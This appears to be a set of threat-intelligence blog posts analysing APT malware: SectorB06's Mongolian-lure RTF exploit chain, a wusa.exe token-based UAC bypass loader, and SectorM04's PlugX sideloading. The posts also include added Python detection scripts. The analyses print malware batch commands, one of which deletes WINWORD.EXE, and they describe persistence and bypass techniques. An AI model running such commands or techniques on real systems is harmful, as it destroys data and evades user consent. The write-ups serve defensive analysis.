The recent spate of military and physical clashes involving Pakistan is feared to spread to cyberwarfare. Against this backdrop, hacking activity in neighboring countries is increasing as countries seek to collect information on diplomatic activities related to Central and Southeast Asian countries.


6. SectorF Activity Features

One hacking group, SectorF01, was found among SectorF hacking groups this April, with hacking activity targeted at countries in Southeast Asia including Vietnam, Cambodia, and East Asia including Japan, China, and South Korea.

The SectorF01 group has previously hacked Southeast Asian countries for political and military interests, but now appears to be interested in hacking for economic interests as well.

This shift in purpose has also led to broader hacking across Southeast Asia and East Asia.

SectorF01's techniques range from watering hole attacks using malicious scripts that exploit vulnerabilities to spear phishing with malicious attachments.

In addition, they have used a variety of techniques, scenarios and strategies to build malware that runs on macOS as well as on Windows.


7. Cyber Crime Groups Activity Features

A total of three groups, SectorJ02, SectorJ03 and SectorJ04, were found conducting cybercrime activity this April.

The areas targeted by these cybercrime groups were found in the Middle East, including Palestine, the United Arab Emirates and Saudi Arabia; in Europe, including the Netherlands, Luxembourg, Sweden, Macedonia, Russia and Italy; in Asia, including South Korea, Japan and Singapore; and in the Americas, including the United States and Mexico.

Financially motivated groups are also found across a wide range of countries, and their purposes differ from those of state-sponsored groups. Since December 2018, however, the SectorJ03 and SectorJ04 groups have shifted their hacking activities to countries in Asia.

For cybercrime, these groups generally use spear phishing as their main technique, with attached malware that mainly consists of macros written to perform malicious functions. They also use Windows-based malicious scripts such as PowerShell, VBScript and batch files.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers.

SectorB06 using Mongolian language in lure document

Overview

SectorB06 is a state-sponsored threat actor group active especially within Asia. They have been exploiting vulnerabilities in Microsoft Office's Equation Editor [1], which Microsoft removed in January 2018 [2]; in this case the exploit appears to be a highly obfuscated version of CVE-2017-11882. The malware we analyzed seems to be sent only after they already have a basic foothold in the target organization.

We came across multiple pieces of their malware used in 2019 which appears to be custom compiled on a per target victim per organization basis, with this particular decoy document being uploaded from a Singapore IP address.

Decoy RTF Document

In this example, SectorB06 made use of a Mongolian decoy document to target their victim.

Decoy document written in Mongolian which references the Ministry of Justice and Internal Affairs of Mongolia

If exploitable, the exploit code drops the first-stage malware DLL at “%APPDATA%\Microsoft\Word\STARTUP\cclerr.wll” and runs it.

First Stage Malware (RasTls.dll)

The malware starts off by resolving a list of encoded API addresses by accessing the address of kernel32 from the InMemoryOrderModuleList inside the Process Environment Block (PEB) using FS:[0x30]. It then gets the address of kernel32.LoadLibraryA and kernel32.GetProcAddress from a function which parses kernel32’s memory block. This is despite the malware already importing LoadLibraryA() and GetProcAddress(), and is used presumably to prevent automated systems from detecting massive amounts of calls to those functions.

From there, it gets the address of the other libraries it makes use of – Shlwapi.dll, Shell32.dll, Gdi32.dll, User32.dll, and Advapi32.dll. Once that is done, it calls the function which parses the various DLLs again close to 100 times in order to resolve all the APIs it uses. In the middle of those calls, it checks CheckRemoteDebuggerPresent and does not resolve the APIs from the other DLLs if a debugger is found, which will cause the malware to exit later before doing anything malicious.

Malware decrypting the imports it uses via its custom hashing algorithm

It then starts a thread which polls the result of CheckRemoteDebuggerPresent constantly and exits once a debugger is found.

Process Name Hashing

The malware checks for the lower-cased process name it is running under at various steps of execution using a string hashing algorithm. In the first step, it checks against the string hash “0xAB341DFA”, “0x190BC0F1”, “0x639EBCBF”, “0xA6AFB610”, “0x4D16CE36”, and “0x64820461”. It only continues execution if the process name hash is one of the first five hashes and the process name hash is not the last hash. We wrote a custom bruteforcing utility and managed to crack the first five hashes, finding the process names which the attacker expected as “winword.exe”, “excel.exe”, “powerpnt.exe”, “acrord32.exe”, and “eqnedt32.exe”. While four of these process names are associated with Microsoft Office and the Equation Editor vulnerabilities, “acrord32.exe” (Adobe Reader) is also in the expected process name list because the malware will in some situations rename the legitimate signed Symantec executable file (described later) to “AcroRd32.exe”.

Malware making sure the process name is related to the exploit source or itself

Besides this initial check, it also checks the hashes of process names at three other points of execution. Only the hash 0x84F39C89 is checked against the entire process list, and it is not a lower-cased version of the process name.

| Hash | Meaning | Description |
|---|---|---|
| 0x0E867CB6 | rundll32.exe | If the process is rundll32.exe, do not continue |
| 0xA54ACF71 | explorer.exe | If the process is not explorer.exe/services.exe, do not continue |
| 0xCD163D44 | services.exe | If the process is not explorer.exe/services.exe, do not continue |
| 0x84F39C89 | <unknown> | If this process exists, do not inject into dllhost.exe |

From this we can see that there are actually two points from which the malware expects to run: the Microsoft Office exploit path, which injects the second stage malware into dllhost.exe, or another path which injects into explorer.exe/services.exe.

Persistence

This first stage malware mainly decompresses and drops two files being used for persistence.

| File Name | Description |
|---|---|
| RasTls.dll | Renamed from cclerr.wll |
| IntelGraphicsController.exe / AcroRd32.exe | Legitimate signed Symantec file (real name: dot1xtra.exe) from Symantec Network Access Control agent (version 12.1.671.4971). Hash: 724909ba378a872018a3ae0b68afe4949bc404de31bcbd65a6239c12b3a7a3ea |

Public examples of a different version of this same signed file being abused in the wild were with version 11.0.4010.7, where the filenames used were rastlsc.exe and iassvcs.exe. Though these files were signed, their certificates have long expired.

The files used for persistence are stored in either the “%AppData%\Intel\Intel(R) Processor Graphic\” or “%PROGRAMFILES%\Intel\Intel(R) Processor Graphics\” directories.

The persistence keys used are in <HIVE>\Software\microsoft\windows\currentversion\run, where <HIVE> is either HKLM or HKCU depending on whether the malware has administrative rights. The name of the registry value used is “IntelGraphicsController” with the data “<DIRECTORY_TO_INTELGRAPHICSCONTROLLER.EXE> Processid:{0A10C245-2190-7215-A3C5-43215926716A}”.

Commands Ran

The malware runs CreateProcess from a custom command execution function four times, each run executing takeown followed by icacls twice. The first icacls call attempts to give ownership to the Administrators group and the second attempts to give ownership to the Users group. The four runs cover the RasTls.dll file in the %APPDATA% and %PROGRAMFILES% subdirectories and the IntelGraphicsController.exe file in the %APPDATA% and %PROGRAMFILES% subdirectories.

Besides those commands, it also drops two batch files.

<random.bat> – deleting from initial location

    Ping 127.0.0.1 -n 10
    del "C:\Users\admin\AppData\Roaming\Microsoft\Word\STARTUP\cclerr.wll" /q /f
    del %0 /q /f

<random.bat> – attempting to delete winword.exe

    Ping 127.0.0.1 -n 10
    del "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /q /f
    del %0 /q /f

Timestomping

The malware uses kernel32’s GetFileTime() and SetFileTime() to get the Creation Time, Last Access Time, and Last Write Time of %windir%\system32\kernel32.dll and saves those same times to the RasTls.dll and IntelGraphicsController.exe files. However, these timestamps are only approximate [3] so the fake times will not be an exact match to kernel32.dll’s file time.

The main two files dropped by the malware for persistence have the approximate timestamps of kernel32.dll
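The timestomping described above can be turned into a hunting check. This is an added example, not code from the report: it flags files in the two drop directories named above whose creation, access and write times all sit within a tolerance window of kernel32.dll’s, since the copied values are only approximate. File paths and timestamps are constructed sample data.

```python
"""Check dropped files for kernel32.dll-derived (timestomped) timestamps.

Added example, not code from the original report. The first-stage malware
copies kernel32.dll's creation, last-access and last-write times onto
RasTls.dll and IntelGraphicsController.exe with SetFileTime(); because file
systems store some of these at reduced precision the copies land close to,
not exactly on, the reference. The check uses a tolerance window and only
reports files inside the drop directories the report names, since genuine
OS files legitimately share kernel32's times. Timestamps are plain numbers
so the logic runs anywhere on the constructed sample data below.
"""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class FileTimes:
    path: str
    created: float    # seconds since the epoch
    accessed: float
    modified: float


# Drop directories from the report, lower-cased for matching (constructed from
# the report text with %AppData% / %PROGRAMFILES% already expanded).
DROP_DIRS = (
    r"\appdata\roaming\intel\intel(r) processor graphic",
    r"\program files\intel\intel(r) processor graphics",
)


def near(a: float, b: float, tolerance_s: float) -> bool:
    return abs(a - b) <= tolerance_s


def looks_timestomped(candidate: FileTimes, reference: FileTimes,
                      tolerance_s: float = 2.0) -> bool:
    """True when all three timestamps of `candidate` lie within `tolerance_s`
    of the matching timestamps of `reference` (here kernel32.dll)."""
    return (near(candidate.created, reference.created, tolerance_s)
            and near(candidate.accessed, reference.accessed, tolerance_s)
            and near(candidate.modified, reference.modified, tolerance_s))


def in_drop_dir(path: str) -> bool:
    low = path.lower()
    return any(d in low for d in DROP_DIRS)


def triage(files: Iterable[FileTimes], reference: FileTimes,
           tolerance_s: float = 2.0) -> List[str]:
    """Paths that sit in a known drop directory and carry kernel32-like times."""
    return [f.path for f in files
            if in_drop_dir(f.path) and looks_timestomped(f, reference, tolerance_s)]


# Constructed sample: kernel32.dll times from a hypothetical host plus four
# candidate files. Only the two persistence files should be reported.
K32 = FileTimes(r"C:\Windows\System32\kernel32.dll",
                created=1_554_077_000.0, accessed=1_554_077_000.0,
                modified=1_554_077_000.0)

SAMPLE_FILES = [
    FileTimes(r"C:\Users\admin\AppData\Roaming\Intel\Intel(R) Processor Graphic\RasTls.dll",
              1_554_077_001.0, 1_554_077_000.5, 1_554_077_001.0),   # off by rounding only
    FileTimes(r"C:\Users\admin\AppData\Roaming\Intel\Intel(R) Processor Graphic\IntelGraphicsController.exe",
              1_554_077_000.0, 1_554_077_001.0, 1_554_077_000.0),
    FileTimes(r"C:\Users\admin\Documents\budget.xlsx",
              1_554_077_000.0, 1_554_077_000.0, 1_554_077_000.0),   # same times, wrong place
    FileTimes(r"C:\Program Files\Intel\Intel(R) Processor Graphics\readme.txt",
              1_554_077_000.0, 1_560_000_000.0, 1_554_077_000.0),   # accessed much later
]


def suspicious_sample_paths() -> List[str]:
    return triage(SAMPLE_FILES, K32)


if __name__ == "__main__":
    for p in suspicious_sample_paths():
        print("possible timestomped persistence file:", p)
```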

Victim Identification

The malware identifies its victims using <HIVE>\Software\Intel\Java (with <HIVE> being HKLM/HKCU again) with the name “user”. Malware “1-a” referenced below is the current first stage malware we are describing in this post.

Malware “1-a” and “5-a” contain the same victim identifier values, as do “2-a” and “3-a”. This is interesting because of the second stage malware which we describe briefly later.

| Malware | Victim Identification Value |
|---|---|
| 1-a | 0XdgrHGaayfyBHQ/vCwMP2HE+cNEbzTk6cZ9bYJOH0R2/z9riKtfcWki36ENBhJ/ |
| 2-a | W3qNGgEnxwHShISsHqe4WQlLvmX2q0mstlCuJVt0/qjwLh7CWXM34rJI66fTyf1u |
| 3-a | 4et2q+jmcCeVoPVtVlUeC+Zqq62VN3Q7e7noo8oplXCIvaA22rc7KIYWtv69Nv1rgPeytor20Dv5..oEFQze78uA== |
| 5-a | 0XdgrHGaayfyBHQ/vCwMP2HE+cNEbzTk6cZ9bYJOH0SxvpFWecTmuneM/5p93lQw |

Process Injection

Finally, the malware performs process injection into “%windir%\system32\dllhost.exe /Processid:{712459B2-3311-54C3-910D-0327080553246}” without the second stage ever touching the disk. The injected process, dllhost.exe, is typically a surrogate process for hosting COM DLLs. The list of CLSIDs on a system can be seen under HKEY_CLASSES_ROOT\CLSID. We are unsure what the hardcoded CLSID value “712459B2-3311-54C3-910D-0327080553246” is supposed to represent, but a likely guess is a CLSID used by Symantec, since the malware is impersonating their executable file.

Second Stage Malware

While we did not analyze the second stage malware in great detail, we did decode the C2 information along with other data such as credentials. The samples we analyzed appear to connect to two external C2 IP addresses, 217[.]69[.]8[.]255 and 1[.]187[.]1[.]187, on port 443. It also references an internal IP address, which indicates that these spear phishing documents are sent to targeted victims only after the attacker already has basic access to the victim’s internal network.

One of the purposes of this second stage malware also appears to be for creating a remote command shell.

| Malware | Internal IPs Referenced |
|---|---|
| 1-b | 192[.]168[.]43[.]234 |
| 2-b | 192[.]168[.]111[.]111 |
| 3-b | 192[.]168[.]111[.]111 |
| 4-b | 192[.]168[.]43[.]234 |
| 5-b | 192[.]168[.]43[.]234 |
| 6-b | 192[.]168[.]43[.]234 |

With the malware trying to target/use the same internal IP but with different user identification values, we see how the attacker is custom compiling each malware executable for each victim/attempt in a specific organization.

Summary

SectorB06 is a threat group with very specific interests and in the case of these malware, appears to either already have a basic foothold in the victim network or has already gained and then lost access to the network. They are actively developing their toolkit and are adept at bypassing security solutions at least statically especially for their exploit document and second stage malware.

Indicators of Compromise

Decoy Hash (SHA-256)

803c25767414c31259e15f058d62b6102dfe09d3cfacece57f527d7fb2a50632

IP Addresses

217[.]69[.]8[.]255
1[.]187[.]1[.]187

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK techniques we have observed based on our analysis of this malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1203 Exploitation for Client Execution
T1064 Scripting
T1204 User Execution
T1218 Signed Binary Proxy Execution

Persistence

T1038 DLL Search Order Hijacking
T1060 Registry Run Keys / Startup Folder

Defense Evasion

T1116 Code Signing
T1038 DLL Search Order Hijacking
T1107 File Deletion
T1055 Process Injection
T1218 Signed Binary Proxy Execution
T1045 Software Packing
T1099 Timestomp

Discovery

T1057 Process Discovery
T1012 Query Registry
T1063 Security Software Discovery
T1124 System Time Discovery

Collection

T1119 Automated Collection

Exfiltration

T1022 Data Encrypted

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

References

[1] Microsoft Office: List of security vulnerabilities, https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-320/cvssscoremin-9/cvssscoremax-/Microsoft-Office.html
[2] CVE-2018-0802 | Microsoft Office Memory Corruption Vulnerability, https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0802
[3] GetFileTime function, https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-getfiletime

Threat Actor Group using UAC Bypass Module to run BAT File

Overview

Our Threat Recon team continues to collect and analyze activity-related data from multiple APT groups. We analyzed malware used in hacking activities targeting organizations located in South Korea, the US and East Asia earlier this year. The attackers use a CAB file that bundles the malware, separate configuration files and a specific User Account Control (UAC) bypass module. This article briefly describes the infection method of the malware they were using at the time and the UAC bypass module used.

Infection Method

The attackers take quite a few steps to build their malware, and the initial infection comes from malicious documents attached to spear phishing emails. When a user opens the attachment, a script embedded in the document downloads a batch file, which in turn downloads a base64-encoded CAB file from a remote site.

Infection method using CAB file

The following is the sequence of the infection method that they use.

  1. Download the base64-encoded data “1.txt” via the script embedded in the malicious document
  2. Decode “1.txt” to create “1.bat” and run “1.bat”
  3. “1.bat” downloads “2.txt” (32-bit) or “3.txt” (64-bit) according to the Windows platform environment
  4. Decode “2.txt” or “3.txt” to create “setup.cab”

Each file looks like an SSL certificate because it begins with the string “-----BEGIN CERTIFICATE-----”, but the body is actually a base64-encoded CAB or BAT file.

Left: The 1.bat file used to decompress the CAB file and run the main payload
Right: The 2.txt CAB file for 32-bit Windows systems
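The certificate disguise is easy to see through once the base64 body is decoded, because a DER certificate and a Microsoft Cabinet start with different bytes. The following is an added example (not code from the report) that decodes the PEM body of such a file and reports whether it is a CAB archive, a script or a real certificate; the sample files are constructed.

```python
"""Tell a real PEM certificate apart from base64-armoured CAB/BAT payloads.

Added example, not code from the original report. The loader described above
stores its stages as text beginning with "-----BEGIN CERTIFICATE-----" whose
base64 body is a Microsoft Cabinet (2.txt / 3.txt) or a batch file (1.txt).
A DER-encoded certificate always starts with an ASN.1 SEQUENCE tag (0x30),
while a cabinet starts with the magic "MSCF"; printable text that is neither
is reported as a script. The sample "certificates" below are constructed.
"""
import base64
import re
import string
from typing import Dict, Optional

# Tolerate en/em dashes and spaces around the armour, which copy-paste and
# blog rendering (as in the report text itself) often introduce.
PEM_BLOCK = re.compile(
    r"[-\u2013\u2014]+\s*BEGIN CERTIFICATE\s*[-\u2013\u2014]+"
    r"(?P<body>.*?)"
    r"[-\u2013\u2014]+\s*END CERTIFICATE\s*[-\u2013\u2014]+",
    re.DOTALL,
)
PRINTABLE = set(string.printable)


def pem_payload(text: str) -> Optional[bytes]:
    """Decode the base64 body of the first PEM block, or None if absent/invalid."""
    m = PEM_BLOCK.search(text)
    if not m:
        return None
    body = "".join(m.group("body").split())
    try:
        return base64.b64decode(body, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def classify(payload: bytes) -> str:
    """Return 'cab', 'der-certificate', 'script' or 'binary-unknown'."""
    if payload[:4] == b"MSCF":
        return "cab"
    if payload[:1] == b"\x30":
        return "der-certificate"
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return "binary-unknown"
    if text and all(ch in PRINTABLE for ch in text):
        return "script"
    return "binary-unknown"


def classify_pem_text(text: str) -> str:
    payload = pem_payload(text)
    return "not-pem" if payload is None else classify(payload)


def armour(payload: bytes) -> str:
    """Wrap bytes the way the loader does (constructed helper for the samples)."""
    b64 = base64.b64encode(payload).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# Constructed stand-ins: a minimal CAB header, a harmless batch stub, and the
# opening bytes of a DER SEQUENCE. None is real malware or a real certificate.
SAMPLES: Dict[str, str] = {
    "2.txt": armour(b"MSCF" + b"\x00" * 32),
    "1.txt": armour(b"@echo off\r\nrem constructed stand-in for 1.bat\r\n"),
    "server.crt": armour(b"\x30\x82\x01\x0a\x30\x81\xf2" + b"\x00" * 8),
    "notes.txt": "just a text file with no armour",
}


def classify_samples() -> Dict[str, str]:
    return {name: classify_pem_text(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, kind in classify_samples().items():
        print(f"{name}: {kind}")
```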

The CAB file is created according to the Windows platform environment through the following files:

  1. BAT file for main payload file execution
  2. INI file containing attacker server address
  3. DLL file for UAC bypass
  4. Main EXE payload

Why does UAC Run?

This malware’s first batch file (1.bat) executes a second batch file which installs the main payload. A UAC pop-up will normally be shown to the user and this is caused by the code in the BAT file that installs the main payload. It copies the INI configuration file and the main payload EXE into the System32 folder.

In general, when files are copied to the System32 folder, a UAC pop-up will run for security reasons. This folder should not be modified in normal situations because it contains important files used to operate the system.

Why UAC runs

BAT File Details

The first batch file (1.bat) downloads the file from a remote server and uses the “net session > nul” command to verify the current user’s rights, then performs the following actions:

  • If admin: delete the UAC bypass DLL, then execute the main payload and BAT file
  • If not admin: execute the following command using rundll32.exe
    Command: “[UAC Bypass Module], EntryPoint [Main Payload execution BAT file]”

Batch Code

The batch file used to install the main payload copies the main payload executable and INI configuration files into the System32 folder, and then runs the main payload which was moved to the System32 folder.

BAT file running Main Payload Code

About UAC

User Account Control (UAC) is a Windows operating system security control function based on the concept of access tokens. It displays a screen informing the user when a program requires administrator level privileges, acting as a warning prompt for user consent of unknown privileged activity.

UAC popped up on screen

How it works

When a user logs into Windows, they are given an access token. This token holds the user’s security identifier (SID), Windows privileges and the access level granted to the user, and Windows uses it to verify the user’s privileges. The access tokens generated at login are:

  • standard user : Generates a standard user access token
  • administrator : Generate standard user access token, administrator access token

The system assigns the following integrity levels according to the token privileges of the logged-in user, and performs access control by comparing the access rights in an object’s security descriptor with the user’s SID.

Processes that run at Medium Level

Issued tokens are used for events such as process creation. The important thing here is that when a process is created after issuing a token, the administrator also executes the new process using the standard user access token.

Generally, explorer.exe, which is the parent process of most user processes, operates at medium integrity level, so most processes run at the same level as explorer.exe. But when a process requires a high integrity level, it can obtain elevated privileges if the user approves.

This basically means that a process typically uses a standard user access token and uses the UAC to get the user’s authorization if an administrator access token is needed.

The following actions are examples of events which trigger UAC:

  • Running an application as an administrator
  • Changes to system-wide settings
  • Changes to files in folders that standard users don’t have permissions for (such as %SystemRoot% or %ProgramFiles% in most cases)
  • Changes to an access control list (ACL), commonly referred to as file or folder permissions
  • Installing device drivers
  • Installing ActiveX controls
  • Changing settings for Windows Firewall
  • Changing UAC settings
  • Configuring Windows Update
  • Adding or removing user accounts
  • Changing a user’s account type
  • Turning on the Guest account (Windows 7 and 8.1)
  • Turning on file sharing or media streaming
  • Configuring Parental Controls

UAC Bypass Module

However, the attackers in this case use a particular DLL module for bypassing UAC. It seems to have been created by referring to the source code of a file named UAC-TokenMagic.ps1 which is open source on GitHub.

First, it creates a wusa.exe process (an auto-elevatable process) that runs at a High Integrity Level. This process is the Windows Update Standalone installer, and it has an auto-elevate attribute so it does not pop up UAC if the system UAC popup setting is “Notify me only when programs / apps try to make changes to my computer”.

After creating wusa.exe, it copies that process’s token and runs cmd.exe via CreateProcessWithLogonW using the copied token. cmd.exe therefore runs at a High Integrity Level and executes “/c EntryPoint %Temp%\[BAT file that installs the main payload]”, and this batch file inherits the elevated privileges of cmd.exe.

Part of the UAC Bypass module code

If the attacker is using the UAC bypass module, the batch file that runs the main payload will work through the cmd.exe generated by copying the access token from wusa.exe. In conclusion, the UAC will not pop up even if the code that moves the file into the System32 folder in batch file is executed.

Summary

The attackers compress the UAC bypass module together with the other components and distribute them in CAB format. We have seen this threat actor group mainly use decoy documents written in Russian, English and Korean, and use the BABYFACE and SYSCON malware variants as the main payload. Such activity may be related in part to the activities of previously known threat actor groups. Our Threat Recon team will continue to monitor these cyber threats.

Indicators of Compromise

IP Addresses

103[.]249[.]31[.]159
88[.]99[.]13[.]69
154[.]16[.]201[.]104

References

PowerShell-Suite/UAC-TokenMagic.ps1
Reading Your Way Around UAC (Part 1)
User Account Control

SectorM04 Targeting Singapore – An Analysis

Overview

On or around June 27, 2018, the personal particulars of almost 1.5 million people were exfiltrated from a SingHealth database in Singapore where patient information was stored. Multiple pieces and types of malware were used in this attack, which took place over almost a year [1].

Illustration using details from p.53 of the COI report

On 6th March, Symantec released a blog article [2] linking several pieces of malware, and a threat group which we will be tracking as SectorM04, to Singapore’s SingHealth breach last year. One artifact on which we found an exact match was the DLL shellcode loader referred to as Trojan.Vcrodat, one of the files dropped by a sample that has the characteristics of the PlugX RAT. PlugX is a RAT which has been used by multiple threat groups, including one reported to have interests in the healthcare sector [3].

Decoy (e9b12791e0ab3a952fa09afd29e5a1416abd917edf5c913af7573adf8ccc39b0)

The dropper for that file was in the form of a decoy executable/document and named as “PositionRequirement-SeniorCivilEngineer.doc.exe”. Opening this results in the Word document below being opened, and everything will seem normal to the victim.

Decoy document that is opened after executing the malware

However, this is actually a trick because the malware uses a “.docx.exe” extension. The actual executable drops other files in the same folder – a legitimate signed executable, a malicious DLL file which abuses the DLL search order [4] from the executable, a compressed shellcode file, a simple batch script (a.bat) to clear its tracks, and a normal Word document. The executable then executes the normal Word document, the batch script, and drops the remaining three files and executes the legitimate signed executable.

a.bat – a simple batch script to hide the tracks of the original EXE
    :Repeat
    del <filepath>\filename.docx.exe
    if exist <filepath>\filename.docx.exe goto Repeat

If this was the RAT used for the initial infection, then it seems to reinforce the theory that one likely initial infection vector was via spear phishing using a link or an archived file [1]. This is because using an exploit to automatically run this dropper would not make sense as the malware also automatically opens a benign Word document which would arouse suspicion if it opened by itself.

PlugX Trinity

Those remaining three files are actually the three files in what other researchers have dubbed the PlugX Trinity [5] – a legitimate signed executable, a loader DLL, and a shellcode file.

In this example, while the legitimate signed executable was a file named adobe.exe it was actually an application from ESET. However, the attacker uses DLL side loading, and this “adobe.exe” file tries to load MSVCR110.dll which is a legitimate system DLL. But because of the way the DLL search order works, the system tries to find MSVCR110.dll from the directory from which the application loaded first, thus loading the attacker’s version of MSVCR110.dll.

The malicious MSVCR110.dll is a tiny DLL made up of the exported functions which the real MSVCR110.dll should have. These exported functions simply jump to MSVCR90.dll when called, except for “__crtGetShowWindowMode”, which calls the malicious function. The malicious function proceeds to read the MSVCR110.dat shellcode file into memory, decompress the buffer using RtlDecompressBuffer with the COMPRESSION_FORMAT_LZNT1 scheme, a method seen since the early days of the PlugX RAT [6], and further unpack the shellcode. Throughout the unpacking process, it makes use of its Process Environment Block (PEB) to parse the PEB_LDR_DATA structure for the addresses of the functions and libraries it wants to use.

When starting, this malware uses the Global mutex named “eeclnt”. It will run another copy of itself with the arguments “258”, and this copy will run %windir%\system32\msiexec.exe as it disables WOW64 redirection.

The created msiexec.exe will be started with the flags 0x434 which among other things starts the process in a suspended mode and command line arguments “259”, then performs process injection so that the malware is running as msiexec.exe.

Persistence

In order to persist on a system, the malware makes use of %APPDATA%\Windows folder, setting the folder attributes to HIDDEN | SYSTEM and moving MSVCR110.dll, MSVCR110.dat, and eeclnt.exe (renamed from adobe.exe) there. It stores this new location of the shellcode file (MSVCR110.dat) in an environment variable “%UI00%” and the location of the DLL file (MSVCR110.dll) in an environment variable “%UI01%”.

There are two persistence mechanisms it makes use of:

  1. Service with service name and display name set to “WanServer”, which starts %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”. The service description used is “Network for this computer. If this service is stopped, these functions will be unavailable.”, which is a generic sounding but unique description for this malicious service.
  2. If the service failed to be created, most likely due to insufficient privileges, then the malware would make use of the standard run registry key located at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with key “eeclnt” and value %APPDATA%\Windows\eeclnt.exe with the command line arguments “260”.

| Command Line | Description |
|---|---|
| NULL | Re-run with arguments “258” and continue |
| “258” / “260” | Run %windir%\system32\msiexec.exe with arguments “259” or “261” respectively in suspended mode and inject itself into it |
| “259” | Create persistence via service / run registry key and run itself as “eeclnt.exe” with arguments “260” |
| “261” | Run normally, including C2 communications |
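The command-line state machine above gives a defender two cheap signals: a legitimate msiexec.exe is never started with a bare three-digit number as its only argument, and nothing legitimate runs out of %APPDATA%\Windows\. The following is an added example (not the analysts’ code) that applies those checks to constructed process-creation events; the field names are assumptions modelled on Sysmon Event ID 1.

```python
r"""Flag PlugX-style relaunch chains in process-creation telemetry.

Added example, not code from the original analysis. Per the table above,
"258"/"260" launch %windir%\system32\msiexec.exe with "259"/"261" and inject
into it, "259" persists as eeclnt.exe "260", and "261" is the working mode.
Event field names (Image, CommandLine, ParentImage) are assumptions modelled
on Sysmon Event ID 1; all events below are constructed.
"""
import ntpath
import re
from typing import Dict, List

PLUGX_MODES = {"258", "259", "260", "261"}
BARE_NUMBER = re.compile(r"^\d{3}$")
APPDATA_WINDOWS = re.compile(r"\\users\\[^\\]+\\appdata\\roaming\\windows\\", re.I)


def arguments(cmdline: str) -> str:
    """Strip the (possibly quoted) program token and return the argument string."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event matches the PlugX pattern (empty if benign)."""
    reasons = []
    image = ntpath.basename(event["Image"]).lower()
    args = arguments(event.get("CommandLine", ""))
    parent = event.get("ParentImage", "") or "<unknown parent>"

    if image == "msiexec.exe" and BARE_NUMBER.match(args):
        why = "msiexec.exe started with bare numeric argument %s" % args
        if args in PLUGX_MODES:
            why += " (known PlugX mode)"
        reasons.append(why + " by " + parent)
    if image == "eeclnt.exe":
        reasons.append("image name eeclnt.exe (renamed legitimate ESET executable)")
    if APPDATA_WINDOWS.search(event["Image"]):
        reasons.append("executable runs from the %APPDATA%\\Windows\\ persistence folder")
    return reasons


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each matching event to its reasons."""
    flagged = {}
    for i, e in enumerate(events):
        reasons = evaluate(e)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed events following the chain in the table, plus two benign ones.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\victim\Downloads\adobe.exe",
     "CommandLine": r'"C:\Users\victim\Downloads\adobe.exe" 258',
     "ParentImage": r"C:\Users\victim\Downloads\adobe.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe 259",
     "ParentImage": r"C:\Users\victim\Downloads\adobe.exe"},
    {"Image": r"C:\Users\victim\AppData\Roaming\Windows\eeclnt.exe",
     "CommandLine": r'"C:\Users\victim\AppData\Roaming\Windows\eeclnt.exe" 260',
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Temp\tool.msi" /qn',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\System32\msiexec.exe /V",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"])
        for line in why:
            print("   -", line)
```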

C2 Beacon

The malware beacons using a legitimate HTTPS POST on port 443 to “/login.asp?id=%d” where %d is the victim identifier using the user-agent “User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)” via WinINet.dll’s HttpSendRequestA. If the configuration uses a different port, then the request is done via HTTP.

Hooking

The malware manually sets inline hooks on SspiCli.dll’s AcquireCredentialsHandleA function if running on Windows 10. AcquireCredentialsHandleA is actually a function normally called from secur32.dll, which then forwards the API call to SspiCli.dll. Before performing the actual function, the inline hook will use the process token from explorer.exe and perform ImpersonateLoggedOnUser() with that token, which is a trick we are seeing for the first time and seems to be for UAC bypass.

The malware also manually sets inline hooks on Ws2_32.dll’s closesocket and shutdown functions. Before performing the closesocket function, the inline hook will perform “setsockopt(socket, SOL_SOCKET, SO_DONTLINGER, 0, 4)”, and on shutdown the inline hook will simply return from the function instead.

Information Collected

The malware mainly collects the following information from the system automatically:

  • Major, minor, and build OS versions
  • NetBIOS Name
  • MAC Address
  • Logged on user name

Other PlugX Capabilities

Similar to previous PlugX variants [7], this version zeroes out its entire PE header (with no false “XV” header), together with certain other PE sections we presume the attacker did not want others to see.

Finally, besides this technical analysis, it is important to remember that PlugX in general has reverse shell capabilities and typically has additional modules which might be either decrypted or downloaded as shellcode [8].

Summary

While we cannot be sure of the SectorM04’s motives, healthcare data is information that has a lot of potential for intelligence gathering with the most obvious being used for blackmail. They have shown their willingness, ability, and patience to compromise their targets, of which Singapore appears to be one of the bigger ones. As is the case for many nation state threat actor groups, it is important to remember that cyber is only one part of an intelligence operation.

ATT&CK Matrix

